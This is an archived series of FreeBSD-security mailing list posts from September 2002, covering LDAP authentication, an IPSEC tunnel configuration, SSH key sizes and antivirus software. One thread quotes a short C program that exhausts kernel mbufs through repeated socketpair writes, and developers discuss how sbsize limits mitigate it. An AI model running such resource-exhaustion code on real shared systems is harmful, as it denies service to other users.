From owner-freebsd-security Sun Sep 1 3:21:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7671937B400; Sun, 1 Sep 2002 03:21:29 -0700 (PDT) Received: from antalya.lupe-christoph.de (pD9E8846F.dip0.t-ipconnect.de [217.232.132.111]) by mx1.FreeBSD.org (Postfix) with ESMTP id D505343E4A; Sun, 1 Sep 2002 03:21:27 -0700 (PDT) (envelope-from lupe@lupe-christoph.de) Received: by antalya.lupe-christoph.de (Postfix, from userid 1000) id 3F0555EB; Sun, 1 Sep 2002 12:21:25 +0200 (CEST) Date: Sun, 1 Sep 2002 12:21:25 +0200 To: Mark R V Murray Cc: freebsd-security@freebsd.org Subject: Re: Administrativia: New list charter Message-ID: <20020901102125.GD2823@lupe-christoph.de> References: <200208310904.g7V94xl5064447@grimreaper.grondar.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200208310904.g7V94xl5064447@grimreaper.grondar.org> User-Agent: Mutt/1.4i From: lupe@lupe-christoph.de (Lupe Christoph) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Saturday, 2002-08-31 at 10:04:59 +0100, Mark R V Murray wrote: > FREEBSD-SECURITY Security issues > This is a technical discussion list covering FreeBSD security issues. > The intention is for the list to contain a high-signal, low-noise > discussion of issues affecting the security of FreeBSD. Fine. Clear enough in my book. Can we now start freebsd-security-questions or -questions-security? Otherwise, we will just have the same number of of OT questions. Perhaps more moral right to send them to -questions, but nobody will help them anymore. (Or more people will go OT.) Thanks, Lupe Christoph -- | lupe@lupe-christoph.de | http://www.lupe-christoph.de/ | | Big Misunderstandings #6398: The Titanic was not supposed to be | | unsinkable. The designer had a speech impediment. He said: "I have | | thith great unthinkable conthept ..." | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 2 2: 5:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4500937B400 for ; Mon, 2 Sep 2002 02:05:13 -0700 (PDT) Received: from daemon.esiee.fr (daemon.esiee.fr [147.215.1.16]) by mx1.FreeBSD.org (Postfix) with ESMTP id BFC0F43E72 for ; Mon, 2 Sep 2002 02:05:12 -0700 (PDT) (envelope-from frankb@daemon.esiee.fr) Received: by daemon.esiee.fr (Postfix, from userid 179) id 92BB9105B6; Mon, 2 Sep 2002 11:04:09 +0200 (CEST) Date: Mon, 2 Sep 2002 11:04:09 +0200 From: Frank Bonnet To: freebsd-security@freebsd.org Subject: LDAP authentication ? Message-ID: <20020902110409.A11787@daemon.esiee.fr> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi Is it possible to use LDAP as an authentication system with FreeBSD 4.6.2 to replace NIS that I use for now ? If yes what do I need to install for ? Thanks for any infos -- Frank To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 2 6:43:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AF42237B400 for ; Mon, 2 Sep 2002 06:43:22 -0700 (PDT) Received: from insomnia.spc.org (insomnia.spc.org [195.224.94.183]) by mx1.FreeBSD.org (Postfix) with SMTP id 9183643E42 for ; Mon, 2 Sep 2002 06:43:21 -0700 (PDT) (envelope-from bms@insomnia.spc.org) Received: (qmail 23911 invoked by uid 1031); 2 Sep 2002 13:42:01 -0000 Date: Mon, 2 Sep 2002 14:42:01 +0100 From: Bruce M Simpson To: Frank Bonnet Cc: freebsd-security@freebsd.org Subject: Re: LDAP authentication ? Message-ID: <20020902134200.GB2409@spc.org> Mail-Followup-To: Bruce M Simpson , Frank Bonnet , freebsd-security@freebsd.org References: <20020902110409.A11787@daemon.esiee.fr> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020902110409.A11787@daemon.esiee.fr> User-Agent: Mutt/1.3.28i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Sep 02, 2002 at 11:04:09AM +0200, Frank Bonnet wrote: > Is it possible to use LDAP as an authentication system > with FreeBSD 4.6.2 to replace NIS that I use for now ? > > If yes what do I need to install for ? Google for ypldapd. This was also covered in previous discussion on this list so please search the archives at www.freebsd.org for this term. There are reasons why LDAP can't be used directly. BMS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 2 14:15:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0CF8037B401 for ; Mon, 2 Sep 2002 14:15:36 -0700 (PDT) Received: from web12904.mail.yahoo.com (web12904.mail.yahoo.com [216.136.174.71]) by mx1.FreeBSD.org (Postfix) with SMTP id 8158843E75 for ; Mon, 2 Sep 2002 14:15:35 -0700 (PDT) (envelope-from bad_dot_c@yahoo.com) Message-ID: <20020902211535.90147.qmail@web12904.mail.yahoo.com> Received: from [24.226.97.66] by web12904.mail.yahoo.com via HTTP; Mon, 02 Sep 2002 22:15:35 BST Date: Mon, 2 Sep 2002 22:15:35 +0100 (BST) From: =?iso-8859-1?q?Ivan=20Streetovich?= Subject: Re: From: Ivan Streetovich, Japan To: Benjamin Krueger , chat@freebsd.org, security@freebsd.org In-Reply-To: <20020902015252.G64882@mail.seattleFenix.net> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --- Benjamin Krueger wrote: > * Ivan Streetovich (bad_dot_c@yahoo.com) [020901 > 23:15]: > > > > > > > > __________________________________________________ > > Do You Yahoo!? > > Everything you'll ever need on one web page > > from News and Sport to Email and Music Charts > > http://uk.my.yahoo.com > > Date: Mon, 2 Sep 2002 07:05:52 +0100 (BST) > > From: Ivan Streetovich > > Subject: From: Ivan Streetovich, Japan > > To: security@freebsd.com > > > > #define BUFFERSIZE 204800 > > extern int > > > > /* Released by Ivan Streetovich, Japan * > > * Causes problems on FreeBSD */ > > > > main(void) > > { > > int p[2], i; > > char crap[BUFFERSIZE]; > > while (1) > > { > > if (socketpair(AF_UNIX, > SOCK_STREAM, > > 0, p) == -1) > > break; > > i = BUFFERSIZE; > > setsockopt(p[0], SOL_SOCKET, > > SO_RCVBUF, &i, sizeof(int)); > > setsockopt(p[0], SOL_SOCKET, > > SO_SNDBUF, &i, sizeof(int)); > > setsockopt(p[1], SOL_SOCKET, > > SO_RCVBUF, &i, sizeof(int)); > > setsockopt(p[1], SOL_SOCKET, > > SO_SNDBUF, &i, sizeof(int)); > > fcntl(p[0], F_SETFL, O_NONBLOCK); > > fcntl(p[1], F_SETFL, O_NONBLOCK); > > write(p[0], crap, BUFFERSIZE); > > write(p[1], crap, BUFFERSIZE); > > } > > exit(0); > > } > > This problem (and this exact source code, funnily > enough. Are you sure you > released it?) has already been reported to the > security-officer and is > (afaik) being addressed by the developers. =) > > -- > Benjamin Krueger > > "Everyone has wings, some folks just don't know what > they're for" > - B. Banzai > ---------------------------------------------------------------- > Send mail w/ subject 'send public key' or query for > (0x251A4B18) > Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 > 7711 251A 4B18 i got first, was sent SO from x-friend __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 2 14:33:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 663F037B49A; Mon, 2 Sep 2002 14:33:03 -0700 (PDT) Received: from mail.seattleFenix.net (seattleFenix.net [216.39.145.247]) by mx1.FreeBSD.org (Postfix) with ESMTP id 94E1343E42; Mon, 2 Sep 2002 14:33:02 -0700 (PDT) (envelope-from roo@mail.seattleFenix.net) Received: (from roo@localhost) by mail.seattleFenix.net (8.11.6/8.11.6) id g82LVSg76426; Mon, 2 Sep 2002 14:31:28 -0700 (PDT) (envelope-from roo) Date: Mon, 2 Sep 2002 14:31:28 -0700 From: Benjamin Krueger To: Ivan Streetovich Cc: Benjamin Krueger , chat@freebsd.org, security@freebsd.org Subject: Re: From: Ivan Streetovich, Japan Message-ID: <20020902143128.J64882@mail.seattleFenix.net> References: <20020902015252.G64882@mail.seattleFenix.net> <20020902211535.90147.qmail@web12904.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020902211535.90147.qmail@web12904.mail.yahoo.com>; from bad_dot_c@yahoo.com on Mon, Sep 02, 2002 at 10:15:35PM +0100 X-PGP-Key: http://www.macguire.net/benjamin/public_key.asc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Ivan Streetovich (bad_dot_c@yahoo.com) [020902 14:14]: > --- Benjamin Krueger > wrote: > * Ivan Streetovich (bad_dot_c@yahoo.com) > [020901 > > 23:15]: > > > > This problem (and this exact source code, funnily > > enough. Are you sure you > > released it?) has already been reported to the > > security-officer and is > > (afaik) being addressed by the developers. =) > > > > -- > > Benjamin Krueger > > i got first, was sent SO from x-friend Interesting. I recieved a copy on Thursday night PST and forwarded it to phk and the security officer in the wee morning hours of Friday... I've heard rumour that it was culled from an (years) old post on a freebsd list. -- Benjamin Krueger "Everyone has wings, some folks just don't know what they're for" - B. Banzai ---------------------------------------------------------------- Send mail w/ subject 'send public key' or query for (0x251A4B18) Fingerprint = A642 F299 C1C1 C828 F186 A851 CFF0 7711 251A 4B18 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 2 17: 6:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C5D7A37B400; Mon, 2 Sep 2002 17:06:22 -0700 (PDT) Received: from patrocles.silby.com (d76.as29.nwbl0.wi.voyager.net [169.207.73.76]) by mx1.FreeBSD.org (Postfix) with ESMTP id 28EE143E72; Mon, 2 Sep 2002 17:06:21 -0700 (PDT) (envelope-from silby@silby.com) Received: from patrocles.silby.com (localhost [127.0.0.1]) by patrocles.silby.com (8.12.6/8.12.5) with ESMTP id g8309ixP001599; Mon, 2 Sep 2002 19:09:44 -0500 (CDT) (envelope-from silby@silby.com) Received: from localhost (silby@localhost) by patrocles.silby.com (8.12.6/8.12.6/Submit) with ESMTP id g8309f5h001596; Mon, 2 Sep 2002 19:09:42 -0500 (CDT) X-Authentication-Warning: patrocles.silby.com: silby owned process doing -bs Date: Mon, 2 Sep 2002 19:09:40 -0500 (CDT) From: Mike Silbersack To: Benjamin Krueger Cc: Ivan Streetovich , , Subject: Re: From: Ivan Streetovich, Japan In-Reply-To: <20020902143128.J64882@mail.seattleFenix.net> Message-ID: <20020902190613.V1590-100000@patrocles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 2 Sep 2002, Benjamin Krueger wrote: > Interesting. I recieved a copy on Thursday night PST and forwarded it to phk > and the security officer in the wee morning hours of Friday... > > I've heard rumour that it was culled from an (years) old post on a freebsd > list. > > -- > Benjamin Krueger This is just another local mbuf exhaustion attack. We should probably put in countermeasures for this one of these days, but it's not all that much of a serious problem. If you have a shell machine you wish to get your access revoked on, then by all means go ahead and use this program. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 3 6:31:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3085D37B401; Tue, 3 Sep 2002 06:30:57 -0700 (PDT) Received: from slc.edu (weir-01c.slc.edu [207.106.89.46]) by mx1.FreeBSD.org (Postfix) with ESMTP id ED35943E42; Tue, 3 Sep 2002 06:30:55 -0700 (PDT) (envelope-from aschneid@mail.slc.edu) Received: (from aschneid@localhost) by slc.edu (8.11.6/8.11.6) id g83EXIW22459; Tue, 3 Sep 2002 14:33:18 GMT (envelope-from aschneid@mail.slc.edu) Date: Tue, 3 Sep 2002 14:33:18 +0000 From: Anthony Schneider To: Mike Silbersack Cc: Benjamin Krueger , Ivan Streetovich , chat@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: From: Ivan Streetovich, Japan Message-ID: <20020903143318.A22434@mail.slc.edu> References: <20020902143128.J64882@mail.seattleFenix.net> <20020902190613.V1590-100000@patrocles.silby.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="HcAYCG3uE/tztfnV" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020902190613.V1590-100000@patrocles.silby.com>; from silby@silby.com on Mon, Sep 02, 2002 at 07:09:40PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --HcAYCG3uE/tztfnV Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable limiting sbsize does the trick. -Anthony. On Mon, Sep 02, 2002 at 07:09:40PM -0500, Mike Silbersack wrote: >=20 > On Mon, 2 Sep 2002, Benjamin Krueger wrote: >=20 > > Interesting. I recieved a copy on Thursday night PST and forwarded it t= o phk > > and the security officer in the wee morning hours of Friday... > > > > I've heard rumour that it was culled from an (years) old post on a free= bsd > > list. > > > > -- > > Benjamin Krueger >=20 > This is just another local mbuf exhaustion attack. We should probably put > in countermeasures for this one of these days, but it's not all that much > of a serious problem. If you have a shell machine you wish to get your > access revoked on, then by all means go ahead and use this program. >=20 > Mike "Silby" Silbersack >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message --HcAYCG3uE/tztfnV Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAj10yC0ACgkQ+rDjkNht5F2exgCfSsOBz3BW4q+jQijqYozSMfat 1BoAn3x3FJvmFHp4wa2cQ4xQm7Nx+wW9 =9uRC -----END PGP SIGNATURE----- --HcAYCG3uE/tztfnV-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 3 7:50: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BBE2937B400 for ; Tue, 3 Sep 2002 07:49:49 -0700 (PDT) Received: from obsidian.sentex.ca (obsidian.sentex.ca [64.7.128.101]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2DD6343E4A for ; Tue, 3 Sep 2002 07:49:49 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simian.sentex.net (pyroxene.sentex.ca [199.212.134.18]) by obsidian.sentex.ca (8.12.5/8.12.5) with ESMTP id g83Enjv3062819 for ; Tue, 3 Sep 2002 10:49:45 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.1.6.0.20020903104701.0591bc10@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 03 Sep 2002 10:50:02 -0400 To: security@freebsd.org From: Mike Tancsa Subject: FreeBSD IPSEC connection to a Cisco Router using ESP (FAQ submission) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (obsidian/20020517) X-Spam-Status: No, hits=0.0 required=7.0 tests=none version=2.31 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Question: How do I setup an IPSEC ESP Tunnel between a Cisco router and FreeBSD AN Answer: OK, I have seen a few people ask this question, but I had not found via the search engines a sample config on how to setup an IPSEC tunnel between a FreeBSD box and Cisco router. We had a customer over the weekend wanting to do just this, so I figured I would post the setup here in case anyone else wanted to do something like this. Given the following setup FreeBSD--------------------------------Cisco 192.168.100.9/24 and 1.1.1.1/30 2.2.2.2/30 and 96.0.0.1/24 i.e. 2 machines connected to the Internet, at distant locations-- FreeBSD box has 1.1.1.1/30 as the public address (i.e. NON RFC 1918) and the Cisco, 2.2.2.2/30. The goal is to setup a VPN tunnel between the two using an IPSEC connection with AH and ESP. For the setup, I used an old Cisco 4700 with only DES encryption. Note, it is recommended that you use something stronger like 3des in a production environment. On the Cisco we have the following config. 4700-router#show run Building configuration... Current configuration : 1991 bytes ! version 12.2 service timestamps debug uptime service timestamps log uptime no service password-encryption ! hostname 4700-router ! boot system flash c4500-jk8s-mz.122-10b.bin aaa new-model ! ip subnet-zero ! ! ! crypto isakmp policy 1 hash md5 authentication pre-share group 2 lifetime 6000 crypto isakmp key donttell address 1.1.1.1. crypto isakmp key donttell address 2.2.2.2 ! crypto ipsec security-association lifetime seconds 6000 ! crypto ipsec transform-set MB esp-des esp-md5-hmac ! crypto map FreeBSDIPSEC-MAP 1 ipsec-isakmp description My customer site called MB set peer 1.1.1.1 set transform-set MB set pfs group2 match address 109 ! ! ! ! interface Ethernet0 ip address 96.0.0.1 255.255.255.0 media-type 10BaseT ! interface FastEthernet0 ip address 2.2.2.2 255.255.255.252 half-duplex crypto map FreeBSDIPSEC-MAP ! ip classless ip route 0.0.0.0 0.0.0.0 2.2.2.1 no ip http server ! access-list 109 permit ip 192.168.100.0 0.0.0.255 96.0.0.0 0.0.0.255 access-list 109 permit ip 96.0.0.0 0.0.0.255 192.168.100.0 0.0.0.255 ! ! line con 0 line aux 0 line vty 0 4 exec-timeout 0 0 ! end 4700-router# On the FreeBSD side, we have the following script, 00_ipsec.sh you can put in /usr/local/etc/rc.d #!/bin/sh case "$1" in start) setkey -F setkey -FP setkey -c <&2 ;; esac exit 0 remote anonymous { exchange_mode main,base,aggressive; doi ipsec_doi; #situation identity_only; my_identifier address 1.1.1.1; nonce_size 16; lifetime time 6000 sec; # sec,min,hour initial_contact on; support_mip6 on; proposal_check obey; # obey, strict or claim proposal { encryption_algorithm des; hash_algorithm md5; authentication_method pre_shared_key ; dh_group 2 ; } } sainfo anonymous { pfs_group 2; lifetime time 6000 sec; encryption_algorithm des,3des ; authentication_algorithm hmac_md5; compression_algorithm deflate; } And dont forget to add 2.2.2.2 donttell to /usr/local/etc/racoon/psk.txt In terms of interfaces, we just have the 2... No gif. To bring up the tunnel, make sure you do a ping specifying the source address e.g. ping -S 192.168.100.9 96.0.0.1 or just generate something from behind the FreeBSD box. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 3 9:49:11 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 61A7137B400; Tue, 3 Sep 2002 09:49:04 -0700 (PDT) Received: from patrocles.silby.com (d7.as8.nwbl0.wi.voyager.net [169.207.132.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id C460243E3B; Tue, 3 Sep 2002 09:49:02 -0700 (PDT) (envelope-from silby@silby.com) Received: from patrocles.silby.com (localhost [127.0.0.1]) by patrocles.silby.com (8.12.6/8.12.5) with ESMTP id g83GqQxP005932; Tue, 3 Sep 2002 11:52:26 -0500 (CDT) (envelope-from silby@silby.com) Received: from localhost (silby@localhost) by patrocles.silby.com (8.12.6/8.12.6/Submit) with ESMTP id g83GqOTU005929; Tue, 3 Sep 2002 11:52:25 -0500 (CDT) X-Authentication-Warning: patrocles.silby.com: silby owned process doing -bs Date: Tue, 3 Sep 2002 11:52:24 -0500 (CDT) From: Mike Silbersack To: Alfred Perlstein Cc: Benjamin Krueger , Ivan Streetovich , , Subject: Re: From: Ivan Streetovich, Japan In-Reply-To: <20020903055340.GF73747@elvis.mu.org> Message-ID: <20020903115002.T5618-100000@patrocles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 2 Sep 2002, Alfred Perlstein wrote: > * Mike Silbersack [020902 17:06] wrote: > > > > This is just another local mbuf exhaustion attack. We should probably put > > in countermeasures for this one of these days, but it's not all that much > > of a serious problem. If you have a shell machine you wish to get your > > access revoked on, then by all means go ahead and use this program. > > I think the 'sbsize' ulimit already protects people from this. > > I think the problem is that it's not set by default, however I think > that's somewhat of a good thing as it makes sure we don't bomb out > when someone tries to bench us. Doh, I had forgotten about that setting. Sbsize does work decently in such a situation, but it's not ready to be enabled by default. In addition to the fact that it would bomb out people doing high volume benchmarks, there's also the problem that it accounts for receive buffers, which are empty most of the time. Bosko and I had thrown around some ideas on how to improve mbuf limiting, but we haven't had time to work on them yet. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 3 14:52:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5120537B405 for ; Tue, 3 Sep 2002 14:52:45 -0700 (PDT) Received: from fubar.adept.org (fubar.adept.org [63.147.172.249]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1947443E65 for ; Tue, 3 Sep 2002 14:52:41 -0700 (PDT) (envelope-from mike@adept.org) Received: by fubar.adept.org (Postfix, from userid 1001) id 73D33154AF; Tue, 3 Sep 2002 14:50:23 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by fubar.adept.org (Postfix) with ESMTP id 717921527E; Tue, 3 Sep 2002 14:50:23 -0700 (PDT) Date: Tue, 3 Sep 2002 14:50:23 -0700 (PDT) From: Mike Hoskins To: "Perry E. Metzger" Cc: Michael W Mitton , , , Subject: Re: 1024 bit key considered insecure (sshd) In-Reply-To: <87lm6onqj2.fsf@snark.piermont.com> Message-ID: <20020903144039.I49215-100000@fubar.adept.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 30 Aug 2002, Perry E. Metzger wrote: > Michael W Mitton writes: > > My data may not be worth a billion dollars, but I can be fairly certain > > that I am part of a group ( a rather _large_ group ) whose combined > > information is worth that. If you're not paranoid enough to have already upgraded to larger keys (and dealt with the specific challenges that may present for your organization), then you likely do not need larger keys. As for the organiztions that can afford to spend billions of dollars to crack our keys (although they'd likely spend much less, since they'd fabricate their own systems), the present paranoia warrenting disdain over 1024 bit keys must also point to the possibility that they've been able to crack our keys long before now. Weigh the value of your organization's core assets, and take appropriate action. Nothing has really changed simply because an email was sent to Bugtraq. The same risks present today were in some way present last year, or as far back as your paranoia dictates. I'm not sure who cross-posted to so many lists. My apologies if this isn't appropriate to any included targets. I intend this message for freebsd-security, but do not like to delete/alter To/CC lists in threads I did not start. Later, -Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 3 21:51:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CDA9237B400 for ; Tue, 3 Sep 2002 21:51:40 -0700 (PDT) Received: from earth.hub.org (earth.hub.org [64.49.215.11]) by mx1.FreeBSD.org (Postfix) with ESMTP id 94EAA43E4A for ; Tue, 3 Sep 2002 21:51:40 -0700 (PDT) (envelope-from scrappy@hub.org) Received: from earth.hub.org (earth.hub.org [64.49.215.11]) by earth.hub.org (Postfix) with ESMTP id A8BB92CC801 for ; Wed, 4 Sep 2002 01:51:34 -0300 (ADT) Date: Wed, 4 Sep 2002 01:51:34 -0300 (ADT) From: "Marc G. Fournier" To: freebsd-security@freebsd.org Subject: Anti virus software for FreeBSD ... Message-ID: <20020904014942.F25799-100000@hub.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Seems quite limited ... I'm looking for one to run with amavisd on a mail server, but the only one I can seem to find is vscan, and for that, i can't find any licensing information past that '30 day' period :( I've looked at the openantivirus.org site ... but nothing there is jumping out at me, and their virus definitions look a bit old? anyone? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 3 22:38:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0008C37B400 for ; Tue, 3 Sep 2002 22:38:32 -0700 (PDT) Received: from www.cotse.net (www.cotse.net [216.112.42.60]) by mx1.FreeBSD.org (Postfix) with ESMTP id 50A3A43E3B for ; Tue, 3 Sep 2002 22:38:32 -0700 (PDT) (envelope-from john@cotse.com) Received: from www.cotse.net (www.cotse.net[216.112.42.60]) (authenticated bits=0) by www.cotse.net (8.12.5/8.12.5) with ESMTP id g845itSr094407; Wed, 4 Sep 2002 01:44:56 -0400 (EDT) (envelope-from john@cotse.com) Message-Id: <5.1.0.14.2.20020904011057.03cfdae8@pop.cotse.com> X-Sender: johnh@pop.cotse.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Wed, 04 Sep 2002 01:38:22 -0400 To: "Marc G. Fournier" From: John Holstein Subject: Re: Anti virus software for FreeBSD ... Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020904014942.F25799-100000@hub.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 01:51 AM 9/4/2002 -0300, you wrote: >Seems quite limited ... I'm looking for one to run with amavisd on a mail >server, but the only one I can seem to find is vscan, and for that, i >can't find any licensing information past that '30 day' period :( > >I've looked at the openantivirus.org site ... but nothing there is jumping >out at me, and their virus definitions look a bit old? > >anyone? > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message Kaspersky: Sendmail: http://www.kaspersky.com/buyonline.html?chapter=752114&spage=3 File Server: http://www.kaspersky.com/buyonline.html?chapter=752025&spage=3 F-Prot Dunno if it supports Sendmail yet. http://www.f-prot.com/products/fpfreebsd.html RAV http://www.ravantivirus.com/ That's a few to start, dunno if some of the others are still available. John Holstein To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 3 23: 2:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AB19937B400 for ; Tue, 3 Sep 2002 23:02:53 -0700 (PDT) Received: from smtp.web.de (smtp01.web.de [194.45.170.210]) by mx1.FreeBSD.org (Postfix) with ESMTP id C461343E75 for ; Tue, 3 Sep 2002 23:02:52 -0700 (PDT) (envelope-from Jan.Lentfer@web.de) Received: from [80.129.123.157] (helo=floundjan.homeip.net) by smtp.web.de with esmtp (WEB.DE(Exim) 4.75 #2) id 17mTFQ-0007cS-00; Wed, 04 Sep 2002 08:02:40 +0200 Received: from localhost (localhost.lan [127.0.0.1]) by floundjan.homeip.net (Postfix on FreeBSD 4.5) 